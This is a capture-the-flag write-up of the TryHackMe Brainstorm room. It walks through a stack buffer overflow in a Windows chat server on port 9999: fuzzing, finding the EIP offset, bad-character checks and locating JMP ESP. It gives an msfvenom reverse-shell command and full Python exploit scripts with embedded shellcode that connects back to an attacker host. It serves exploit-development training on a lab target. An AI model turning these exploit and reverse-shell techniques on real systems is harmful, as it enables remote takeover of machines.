Author: Shelldon

Brainstorm Tryhackme [medium] {Buffer overflow, OSCP}

In this post we will talk about the Brainstorm room on THM. This room helps you practise buffer overflows for the OSCP.


#1. Scanning with Nmap.


First of all, scan the target with nmap to find the open ports, among them the one exposing the service we are going to overflow.


Command:


nmap -A -T5 -oN nmap.txt -p- -Pn <IP>

Results:


21/tcp - FTP server

3389/tcp - tcpwrapped

9999/tcp - the vulnerable chat server


#2. Finding the .exe file


In my case FTP didn't work, so I just googled and found the files on GitHub.


#3. Debugging


I started a simple Python HTTP server to copy the files from Kali to my Windows machine.

Now let's debug.


Open Immunity Debugger and load chatserver.exe. Then press F9 to run it.


#4. Fuzzing


Let's create a fuzzer script.

Fuzzer script:


import socket
import time
import sys


buf = b'A' * 100  # start with 100 bytes and grow by 100 each round


while True:
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect(('192.168.1.4', 9999))
        s.recv(1024)              # banner / username prompt
        s.send(b'Shelldon\r\n')   # username
        s.recv(1024)              # message prompt
        print(f'[*] FUZZING with {len(buf)} bytes')
        s.send(buf + b'\r\n')     # the message field is the one that overflows
        buf += b'A' * 100
        s.close()
        time.sleep(1)

    except OSError:
        # connection refused/reset: the server died on the previous send
        print('[!] ERROR')
        sys.exit(0)


After running this script, the server crashed once 2100 bytes had been sent.

That means the buffer is no larger than 2100 bytes.

Buffer <= 2100 bytes


OK, now we need the exact offset within the buffer.

I use a cyclic pattern for this.




#5. Exploit script.

Exploit script:

import socket
import time
import sys


cyclic = b'aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaacraacsaactaacuaacvaacwaacxaacyaaczaadbaadcaaddaadeaadfaadgaadhaadiaadjaadkaadlaadmaadnaadoaadpaadqaadraadsaadtaaduaadvaadwaadxaadyaadzaaebaaecaaedaaeeaaefaaegaaehaaeiaaejaaekaaelaaemaaenaaeoaaepaaeqaaeraaesaaetaaeuaaevaaewaaexaaeyaaezaafbaafcaafdaafeaaffaafgaafhaafiaafjaafkaaflaafmaafnaafoaafpaafqaafraafsaaftaafuaafvaafwaafxaafyaafzaagbaagcaagdaageaagfaaggaaghaagiaagjaagkaaglaagmaagnaagoaagpaagqaagraagsaagtaaguaagvaagwaagxaagyaagzaahbaahcaahdaaheaahfaahgaahhaahiaahjaahkaahlaahmaahnaahoaahpaahqaahraahsaahtaahuaahvaahwaahxaahyaahzaaibaaicaaidaaieaaifaaigaaihaaiiaaijaaikaailaaimaainaaioaaipaaiqaairaaisaaitaaiuaaivaaiwaaixaaiyaaizaajbaajcaajdaajeaajfaajgaajhaajiaajjaajkaajlaajmaajnaajoaajpaajqaajraajsaajtaajuaajvaajwaajxaajyaajzaakbaakcaakdaakeaakfaakgaakhaakiaakjaakkaaklaakmaaknaakoaakpaakqaakraaksaaktaakuaakvaakwaakxaakyaakzaalbaalcaaldaaleaalfaalgaalhaaliaaljaalkaallaalmaalnaaloaalpaalqaalraalsaaltaaluaalvaalwaalxaalyaalzaambaamcaamdaameaamfaamgaamhaamiaamjaamkaamlaammaamnaamoaampaamqaamraamsaamtaamuaamvaamwaamxaamyaamzaanbaancaandaaneaanfaangaanhaaniaanjaankaanlaanmaannaanoaanpaanqaanraansaantaanuaanvaanwaanxaanyaanzaaobaaocaaodaaoeaaofaaogaaohaaoiaaojaaokaaolaaomaaonaaooaaopaaoqaaoraaosaaotaaouaaovaaowaaoxaaoyaaozaapbaapcaapdaapeaapfaapgaaphaapiaapjaapkaaplaapmaapnaapoaappaapqaapraapsaaptaapuaapvaapwaapxaapyaapzaaqbaaqcaaqdaaqeaaqfaaqgaaqhaaqiaaqjaaqkaaqlaaqmaaqnaaqoaaqpaaqqaaqraaqsaaqtaaquaaqvaaqwaaqxaaqyaaqzaarbaarcaardaareaarfaargaarhaariaarjaarkaarlaarmaarnaaroaarpaarqaarraarsaartaaruaarvaarwaarxaaryaarzaasbaascaasdaaseaasfaasgaashaasiaasjaaskaaslaasmaasnaasoaaspaasqaasraassaastaasuaasvaaswaasxaasyaaszaatbaatcaatdaateaatfaatgaathaatiaatjaatkaatlaatmaatnaatoaatpaatqaatraatsaattaatuaatvaatwaatxaatyaatzaaubaaucaaudaaueaaufaaugaauhaauiaaujaaukaaulaaumaaunaauoaaupaauqaauraausaautaauuaauvaauwaauxaauyaau'


try:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(('192.168.1.4', 9999))
    s.recv(1024)              # banner / username prompt
    s.send(b'Shelldon\r\n')   # username
    s.recv(1024)              # message prompt
    print('[*] Sending cyclic')
    s.send(cyclic + b'\r\n')  # the pattern replaces the A's in the message field
    s.close()
    time.sleep(1)

except OSError:
    print('[!] ERROR')
    sys.exit(0)

After running the exploit, the server crashed. Now EIP equals 75616164.


As ASCII that is "uaad". The stack holds the value in reverse (little-endian) byte order, so the pattern bytes that actually landed in EIP are "daau".

That substring sits at offset 2012 in the pattern, so EIP is at position 2012.


Let's update our exploit with this layout (2008 + 4 = 2012 bytes before EIP).

Buffer = 2008 bytes

EBP = 4 bytes

EIP = 4 bytes



#6. Bad chars


The next step is finding bad chars.

I use a badchars script to generate an array of all ASCII values in hex.

The bad chars are appended to the payload right after the EIP value.


Before running the exploit script, let's set up the debugger with mona.

Command:

!mona config -set workingfolder C:/Users/Magzhan/Documents/THM/Brainstorm/%p

After that, create bytearray.

Command:

!mona bytearray -b "\x00"

Let's restart the debugger and send the payload.

The server crashed; now let's compare our stack with the byte array to find the bad chars.

Command:

!mona compare -f <path to bytearray.bin> -a <ESP address>

The only bad char is "\x00".


#7. Finding JMP ESP


Right click -> Search for -> All commands in all modules.

Then type "jmp esp".


Result:

Let's use the second one.

EIP = 625014EB

EIP = b'\xEB\x14\x50\x62' # in little endian
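To check the two numbers the write-up relies on (the offset 2012 derived from EIP = 75616164 in section 5, and the little-endian form of 625014EB above), here is an added example that is not part of the original post: it regenerates the same cyclic pattern (the de Bruijn construction pwntools uses, so it starts "aaaabaaac..." exactly like the one sent), maps the crash value back to its offset, and packs the return address.

```python
import string
import struct

ALPHABET = string.ascii_lowercase  # the alphabet pwntools' cyclic() uses


def de_bruijn(alphabet=ALPHABET, n=4):
    """Yield the de Bruijn sequence B(k, n) one character at a time: every
    length-n window occurs once, so a crash value maps back to one offset."""
    k = len(alphabet)
    a = [0] * (k * n)

    def db(t, p):
        if t > n:
            if n % p == 0:
                for j in range(1, p + 1):
                    yield alphabet[a[j]]
        else:
            a[t] = a[t - p]
            yield from db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                yield from db(t + 1, t)

    yield from db(1, 1)


def cyclic(length):
    """First `length` bytes of the pattern (the write-up sends 2100 of them)."""
    gen = de_bruijn()
    return "".join(next(gen) for _ in range(length)).encode()


def cyclic_find(eip_value, length=2100):
    """Offset of the four pattern bytes that overwrote EIP, given the value as the
    debugger shows it: 0x75616164 is a little-endian dword, so memory holds b'daau'."""
    needle = struct.pack("<I", eip_value)
    return cyclic(length).find(needle)


def jmp_esp_bytes(address):
    """Little-endian encoding of the address placed in the EIP slot."""
    return struct.pack("<I", address)


if __name__ == "__main__":
    print(cyclic_find(0x75616164))      # 2012 = 2008 (buf) + 4 (EBP)
    print(jmp_esp_bytes(0x625014EB))    # b'\xeb\x14Pb'
```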


#8. NOPs and shellcode.


Let's add some nops to payload.

nops = b'\x90' * 32


Shellcode:

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.5 LPORT=4444 -v shellcode -f python -b "\x00"


Exploit for testing locally:

import socket
import time
import sys


# cyclic = b'aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaacraacsaactaacuaacvaacwaacxaacyaaczaadbaadcaaddaadeaadfaadgaadhaadiaadjaadkaadlaadmaadnaadoaadpaadqaadraadsaadtaaduaadvaadwaadxaadyaadzaaebaaecaaedaaeeaaefaaegaaehaaeiaaejaaekaaelaaemaaenaaeoaaepaaeqaaeraaesaaetaaeuaaevaaewaaexaaeyaaezaafbaafcaafdaafeaaffaafgaafhaafiaafjaafkaaflaafmaafnaafoaafpaafqaafraafsaaftaafuaafvaafwaafxaafyaafzaagbaagcaagdaageaagfaaggaaghaagiaagjaagkaaglaagmaagnaagoaagpaagqaagraagsaagtaaguaagvaagwaagxaagyaagzaahbaahcaahdaaheaahfaahgaahhaahiaahjaahkaahlaahmaahnaahoaahpaahqaahraahsaahtaahuaahvaahwaahxaahyaahzaaibaaicaaidaaieaaifaaigaaihaaiiaaijaaikaailaaimaainaaioaaipaaiqaairaaisaaitaaiuaaivaaiwaaixaaiyaaizaajbaajcaajdaajeaajfaajgaajhaajiaajjaajkaajlaajmaajnaajoaajpaajqaajraajsaajtaajuaajvaajwaajxaajyaajzaakbaakcaakdaakeaakfaakgaakhaakiaakjaakkaaklaakmaaknaakoaakpaakqaakraaksaaktaakuaakvaakwaakxaakyaakzaalbaalcaaldaaleaalfaalgaalhaaliaaljaalkaallaalmaalnaaloaalpaalqaalraalsaaltaaluaalvaalwaalxaalyaalzaambaamcaamdaameaamfaamgaamhaamiaamjaamkaamlaammaamnaamoaampaamqaamraamsaamtaamuaamvaamwaamxaamyaamzaanbaancaandaaneaanfaangaanhaaniaanjaankaanlaanmaannaanoaanpaanqaanraansaantaanuaanvaanwaanxaanyaanzaaobaaocaaodaaoeaaofaaogaaohaaoiaaojaaokaaolaaomaaonaaooaaopaaoqaaoraaosaaotaaouaaovaaowaaoxaaoyaaozaapbaapcaapdaapeaapfaapgaaphaapiaapjaapkaaplaapmaapnaapoaappaapqaapraapsaaptaapuaapvaapwaapxaapyaapzaaqbaaqcaaqdaaqeaaqfaaqgaaqhaaqiaaqjaaqkaaqlaaqmaaqnaaqoaaqpaaqqaaqraaqsaaqtaaquaaqvaaqwaaqxaaqyaaqzaarbaarcaardaareaarfaargaarhaariaarjaarkaarlaarmaarnaaroaarpaarqaarraarsaartaaruaarvaarwaarxaaryaarzaasbaascaasdaaseaasfaasgaashaasiaasjaaskaaslaasmaasnaasoaaspaasqaasraassaastaasuaasvaaswaasxaasyaaszaatbaatcaatdaateaatfaatgaathaatiaatjaatkaatlaatmaatnaatoaatpaatqaatraatsaattaatuaatvaatwaatxaatyaatzaaubaaucaaudaaueaaufaaugaauhaauiaaujaaukaaulaaumaaunaauoaaupaauqaauraausaautaauuaauvaauwaauxaauyaau'

buf = b'A' * 2008                 # padding up to the saved EBP
EBP = b'A' * 4                    # saved EBP (overwritten, value irrelevant)
EIP = b'\xEB\x14\x50\x62'         # 0x625014EB (jmp esp), little-endian
nops = b'\x90' * 32               # NOP sled, ESP points here after jmp esp


# bad_chars = b'\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff'
# bad chars: \x00

shellcode =  b""
shellcode += b"\xbb\x6f\xbf\xee\x95\xd9\xc8\xd9\x74\x24\xf4"
shellcode += b"\x5a\x29\xc9\xb1\x52\x83\xc2\x04\x31\x5a\x0e"
shellcode += b"\x03\x35\xb1\x0c\x60\x35\x25\x52\x8b\xc5\xb6"
shellcode += b"\x33\x05\x20\x87\x73\x71\x21\xb8\x43\xf1\x67"
shellcode += b"\x35\x2f\x57\x93\xce\x5d\x70\x94\x67\xeb\xa6"
shellcode += b"\x9b\x78\x40\x9a\xba\xfa\x9b\xcf\x1c\xc2\x53"
shellcode += b"\x02\x5d\x03\x89\xef\x0f\xdc\xc5\x42\xbf\x69"
shellcode += b"\x93\x5e\x34\x21\x35\xe7\xa9\xf2\x34\xc6\x7c"
shellcode += b"\x88\x6e\xc8\x7f\x5d\x1b\x41\x67\x82\x26\x1b"
shellcode += b"\x1c\x70\xdc\x9a\xf4\x48\x1d\x30\x39\x65\xec"
shellcode += b"\x48\x7e\x42\x0f\x3f\x76\xb0\xb2\x38\x4d\xca"
shellcode += b"\x68\xcc\x55\x6c\xfa\x76\xb1\x8c\x2f\xe0\x32"
shellcode += b"\x82\x84\x66\x1c\x87\x1b\xaa\x17\xb3\x90\x4d"
shellcode += b"\xf7\x35\xe2\x69\xd3\x1e\xb0\x10\x42\xfb\x17"
shellcode += b"\x2c\x94\xa4\xc8\x88\xdf\x49\x1c\xa1\x82\x05"
shellcode += b"\xd1\x88\x3c\xd6\x7d\x9a\x4f\xe4\x22\x30\xc7"
shellcode += b"\x44\xaa\x9e\x10\xaa\x81\x67\x8e\x55\x2a\x98"
shellcode += b"\x87\x91\x7e\xc8\xbf\x30\xff\x83\x3f\xbc\x2a"
shellcode += b"\x03\x6f\x12\x85\xe4\xdf\xd2\x75\x8d\x35\xdd"
shellcode += b"\xaa\xad\x36\x37\xc3\x44\xcd\xd0\x2c\x30\xcc"
shellcode += b"\x25\xc5\x43\xce\x34\x49\xcd\x28\x5c\x61\x9b"
shellcode += b"\xe3\xc9\x18\x86\x7f\x6b\xe4\x1c\xfa\xab\x6e"
shellcode += b"\x93\xfb\x62\x87\xde\xef\x13\x67\x95\x4d\xb5"
shellcode += b"\x78\x03\xf9\x59\xea\xc8\xf9\x14\x17\x47\xae"
shellcode += b"\x71\xe9\x9e\x3a\x6c\x50\x09\x58\x6d\x04\x72"
shellcode += b"\xd8\xaa\xf5\x7d\xe1\x3f\x41\x5a\xf1\xf9\x4a"
shellcode += b"\xe6\xa5\x55\x1d\xb0\x13\x10\xf7\x72\xcd\xca"
shellcode += b"\xa4\xdc\x99\x8b\x86\xde\xdf\x93\xc2\xa8\x3f"
shellcode += b"\x25\xbb\xec\x40\x8a\x2b\xf9\x39\xf6\xcb\x06"
shellcode += b"\x90\xb2\xfc\x4c\xb8\x93\x94\x08\x29\xa6\xf8"
shellcode += b"\xaa\x84\xe5\x04\x29\x2c\x96\xf2\x31\x45\x93"
shellcode += b"\xbf\xf5\xb6\xe9\xd0\x93\xb8\x5e\xd0\xb1"


payload = buf + EBP + EIP + nops + shellcode

try:
	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	s.connect(('192.168.1.4', 9999))
	s.recv(1024)
	s.send(b'Shelldon\r\n')
	s.recv(1024)
	print('[*] Sending payload')
	s.send(payload + b'\r\n')
	s.close()
	time.sleep(1)

except:
	print('[!] ERROR')
	sys.exit(0)

Let's restart the debugger, start a netcat listener and run the exploit script.

Nice, we get a shell.

Let's test it against the target machine and get the flag.

Before testing, change the target IP address and regenerate the shellcode for the new LHOST.


Remote exploit script:

import socket
import time
import sys


# cyclic = b'aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaacraacsaactaacuaacvaacwaacxaacyaaczaadbaadcaaddaadeaadfaadgaadhaadiaadjaadkaadlaadmaadnaadoaadpaadqaadraadsaadtaaduaadvaadwaadxaadyaadzaaebaaecaaedaaeeaaefaaegaaehaaeiaaejaaekaaelaaemaaenaaeoaaepaaeqaaeraaesaaetaaeuaaevaaewaaexaaeyaaezaafbaafcaafdaafeaaffaafgaafhaafiaafjaafkaaflaafmaafnaafoaafpaafqaafraafsaaftaafuaafvaafwaafxaafyaafzaagbaagcaagdaageaagfaaggaaghaagiaagjaagkaaglaagmaagnaagoaagpaagqaagraagsaagtaaguaagvaagwaagxaagyaagzaahbaahcaahdaaheaahfaahgaahhaahiaahjaahkaahlaahmaahnaahoaahpaahqaahraahsaahtaahuaahvaahwaahxaahyaahzaaibaaicaaidaaieaaifaaigaaihaaiiaaijaaikaailaaimaainaaioaaipaaiqaairaaisaaitaaiuaaivaaiwaaixaaiyaaizaajbaajcaajdaajeaajfaajgaajhaajiaajjaajkaajlaajmaajnaajoaajpaajqaajraajsaajtaajuaajvaajwaajxaajyaajzaakbaakcaakdaakeaakfaakgaakhaakiaakjaakkaaklaakmaaknaakoaakpaakqaakraaksaaktaakuaakvaakwaakxaakyaakzaalbaalcaaldaaleaalfaalgaalhaaliaaljaalkaallaalmaalnaaloaalpaalqaalraalsaaltaaluaalvaalwaalxaalyaalzaambaamcaamdaameaamfaamgaamhaamiaamjaamkaamlaammaamnaamoaampaamqaamraamsaamtaamuaamvaamwaamxaamyaamzaanbaancaandaaneaanfaangaanhaaniaanjaankaanlaanmaannaanoaanpaanqaanraansaantaanuaanvaanwaanxaanyaanzaaobaaocaaodaaoeaaofaaogaaohaaoiaaojaaokaaolaaomaaonaaooaaopaaoqaaoraaosaaotaaouaaovaaowaaoxaaoyaaozaapbaapcaapdaapeaapfaapgaaphaapiaapjaapkaaplaapmaapnaapoaappaapqaapraapsaaptaapuaapvaapwaapxaapyaapzaaqbaaqcaaqdaaqeaaqfaaqgaaqhaaqiaaqjaaqkaaqlaaqmaaqnaaqoaaqpaaqqaaqraaqsaaqtaaquaaqvaaqwaaqxaaqyaaqzaarbaarcaardaareaarfaargaarhaariaarjaarkaarlaarmaarnaaroaarpaarqaarraarsaartaaruaarvaarwaarxaaryaarzaasbaascaasdaaseaasfaasgaashaasiaasjaaskaaslaasmaasnaasoaaspaasqaasraassaastaasuaasvaaswaasxaasyaaszaatbaatcaatdaateaatfaatgaathaatiaatjaatkaatlaatmaatnaatoaatpaatqaatraatsaattaatuaatvaatwaatxaatyaatzaaubaaucaaudaaueaaufaaugaauhaauiaaujaaukaaulaaumaaunaauoaaupaauqaauraausaautaauuaauvaauwaauxaauyaau'

buf = b'A' * 2008                 # padding up to the saved EBP
EBP = b'A' * 4                    # saved EBP (overwritten, value irrelevant)
EIP = b'\xEB\x14\x50\x62'         # 0x625014EB (jmp esp), little-endian
nops = b'\x90' * 32               # NOP sled, ESP points here after jmp esp


# bad_chars = b'\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff'
# bad chars: \x00


shellcode =  b""
shellcode += b"\xbf\xad\x27\xc7\xc2\xdd\xc3\xd9\x74\x24\xf4"
shellcode += b"\x5e\x2b\xc9\xb1\x52\x31\x7e\x12\x03\x7e\x12"
shellcode += b"\x83\x6b\x23\x25\x37\x8f\xc4\x2b\xb8\x6f\x15"
shellcode += b"\x4c\x30\x8a\x24\x4c\x26\xdf\x17\x7c\x2c\x8d"
shellcode += b"\x9b\xf7\x60\x25\x2f\x75\xad\x4a\x98\x30\x8b"
shellcode += b"\x65\x19\x68\xef\xe4\x99\x73\x3c\xc6\xa0\xbb"
shellcode += b"\x31\x07\xe4\xa6\xb8\x55\xbd\xad\x6f\x49\xca"
shellcode += b"\xf8\xb3\xe2\x80\xed\xb3\x17\x50\x0f\x95\x86"
shellcode += b"\xea\x56\x35\x29\x3e\xe3\x7c\x31\x23\xce\x37"
shellcode += b"\xca\x97\xa4\xc9\x1a\xe6\x45\x65\x63\xc6\xb7"
shellcode += b"\x77\xa4\xe1\x27\x02\xdc\x11\xd5\x15\x1b\x6b"
shellcode += b"\x01\x93\xbf\xcb\xc2\x03\x1b\xed\x07\xd5\xe8"
shellcode += b"\xe1\xec\x91\xb6\xe5\xf3\x76\xcd\x12\x7f\x79"
shellcode += b"\x01\x93\x3b\x5e\x85\xff\x98\xff\x9c\xa5\x4f"
shellcode += b"\xff\xfe\x05\x2f\xa5\x75\xab\x24\xd4\xd4\xa4"
shellcode += b"\x89\xd5\xe6\x34\x86\x6e\x95\x06\x09\xc5\x31"
shellcode += b"\x2b\xc2\xc3\xc6\x4c\xf9\xb4\x58\xb3\x02\xc5"
shellcode += b"\x71\x70\x56\x95\xe9\x51\xd7\x7e\xe9\x5e\x02"
shellcode += b"\xd0\xb9\xf0\xfd\x91\x69\xb1\xad\x79\x63\x3e"
shellcode += b"\x91\x9a\x8c\x94\xba\x31\x77\x7f\xcf\xcd\x28"
shellcode += b"\x0d\xa7\xcf\xd6\xe0\x6b\x59\x30\x68\x84\x0f"
shellcode += b"\xeb\x05\x3d\x0a\x67\xb7\xc2\x80\x02\xf7\x49"
shellcode += b"\x27\xf3\xb6\xb9\x42\xe7\x2f\x4a\x19\x55\xf9"
shellcode += b"\x55\xb7\xf1\x65\xc7\x5c\x01\xe3\xf4\xca\x56"
shellcode += b"\xa4\xcb\x02\x32\x58\x75\xbd\x20\xa1\xe3\x86"
shellcode += b"\xe0\x7e\xd0\x09\xe9\xf3\x6c\x2e\xf9\xcd\x6d"
shellcode += b"\x6a\xad\x81\x3b\x24\x1b\x64\x92\x86\xf5\x3e"
shellcode += b"\x49\x41\x91\xc7\xa1\x52\xe7\xc7\xef\x24\x07"
shellcode += b"\x79\x46\x71\x38\xb6\x0e\x75\x41\xaa\xae\x7a"
shellcode += b"\x98\x6e\xde\x30\x80\xc7\x77\x9d\x51\x5a\x1a"
shellcode += b"\x1e\x8c\x99\x23\x9d\x24\x62\xd0\xbd\x4d\x67"
shellcode += b"\x9c\x79\xbe\x15\x8d\xef\xc0\x8a\xae\x25"


payload = buf + EBP + EIP + nops + shellcode

try:
	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	s.connect(('10.10.48.199', 9999))
	s.recv(1024)
	s.send(b'Shelldon\r\n')
	s.recv(1024)
	print('[*] Sending payload')
	s.send(payload + b'\r\n')
	s.close()
	time.sleep(1)

except:
	print('[!] ERROR')
	sys.exit(0)

Final result:




